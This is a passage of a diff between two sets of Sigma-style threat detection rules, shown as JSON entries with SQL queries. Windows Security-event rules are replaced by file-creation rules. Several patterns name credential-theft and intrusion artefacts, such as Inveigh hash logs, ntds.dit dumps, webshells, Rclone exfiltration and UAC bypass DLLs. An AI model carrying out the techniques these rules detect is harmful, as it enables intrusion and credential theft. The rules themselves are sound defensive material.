Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator activity" + "Cases in which a user mounts an image file for legitimate reasons" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", - "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "status": "test", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "System administrators managing certififcates." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_pfx_file_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of an file in user Word Startup", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Addition of legitimate plugins" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": 